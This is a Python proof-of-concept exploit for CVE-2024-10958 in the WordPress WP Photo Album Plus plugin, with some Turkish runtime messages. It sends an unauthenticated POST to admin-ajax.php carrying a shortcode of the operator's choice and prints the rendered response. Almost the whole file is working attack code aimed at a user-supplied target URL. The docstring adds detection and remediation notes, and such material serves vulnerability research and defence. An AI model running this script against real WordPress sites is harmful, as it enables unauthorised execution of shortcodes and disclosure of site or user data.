#!/usr/bin/env python3
import requests
import argparse
import sys
# Start-up banner: names the affected plugin, the issue class and the CVE
# identifier this proof-of-concept relates to. Printed once by main().
banner = (
    "\n"
    "WordPress WP Photo Album Plus\n"
    "Arbitrary Shortcode Execution\n"
    "CVE-2024-10958\n"
)
def parse_args():
    """Parse the command-line options of the proof-of-concept.

    Returns:
        argparse.Namespace: ``url`` (required, base URL of the WordPress
        site) and ``shortcode`` (shortcode text to submit; defaults to
        ``[user_info]``).
    """
    cli = argparse.ArgumentParser(description='WP Photo Album Plus Exploit')
    # The help texts are user-facing runtime strings and are kept as authored.
    cli.add_argument(
        '-u',
        '--url',
        required=True,
        help='Hedef URL (örn: http://example.com)',
    )
    cli.add_argument(
        '-s',
        '--shortcode',
        default='[user_info]',
        help='Çalıştırılacak shortcode',
    )
    return cli.parse_args()
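def exploit_wppa_shortcode(target_url, shortcode):
    """Send one shortcode to the plugin's AJAX action and print the reply.

    Issues a single POST to ``<target_url>/wp-admin/admin-ajax.php`` with
    ``action=getshortcodedrenderedfenodelay`` and the supplied shortcode.
    No cookies, nonce or credentials are attached to the request.

    Notes for reviewers and defenders:
        * The success branch keys on HTTP 200 only. That shows the endpoint
          answered, not that the shortcode was rendered; the response body
          has to be inspected before treating a site as affected.
        * The request is recognisable by the ``action`` value above in the
          POST body of a call to ``admin-ajax.php``. The value travels in
          the body, so access logs that record only the request line will
          not show it; request-body logging or a WAF rule is needed.
        * Remediation is to update the plugin to the fixed release named in
          the vendor advisory for the CVE printed in the banner.

    Args:
        target_url: Base URL of the WordPress site, e.g. ``http://example.com``.
        shortcode: Shortcode text placed in the ``shortcode`` form field.

    Returns:
        True when the server answered with status 200, False on any other
        status or when the request itself failed.
    """
    print(f"[*] Hedef: {target_url}")
    print(f"[*] Shortcode: {shortcode}")

    # Drop a trailing slash so the joined path does not contain "//".
    endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    payload = {
        'action': 'getshortcodedrenderedfenodelay',
        'shortcode': shortcode,
    }

    try:
        # requests has no default timeout; without one an unresponsive host
        # blocks the script indefinitely.
        response = requests.post(endpoint, data=payload, timeout=10)
    except requests.RequestException as e:
        # Connection, TLS, timeout and malformed-URL errors all land here.
        print(f"[-] Hata: {e}")
        return False

    if response.status_code != 200:
        print("[-] Exploit başarısız!")
        return False

    # NOTE(review): status 200 alone is a weak indicator; see the docstring.
    print("[+] Exploit başarılı!")
    print("[+] Yanıt:", response.text)
    return True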
def main():
    """Script entry point: print the banner, parse the CLI, send the request."""
    print(banner)
    cli = parse_args()
    # The boolean returned by the call is discarded here.
    exploit_wppa_shortcode(target_url=cli.url, shortcode=cli.shortcode)
# Run main() only when the file is executed directly, not when it is imported.
if __name__ == "__main__":
    main()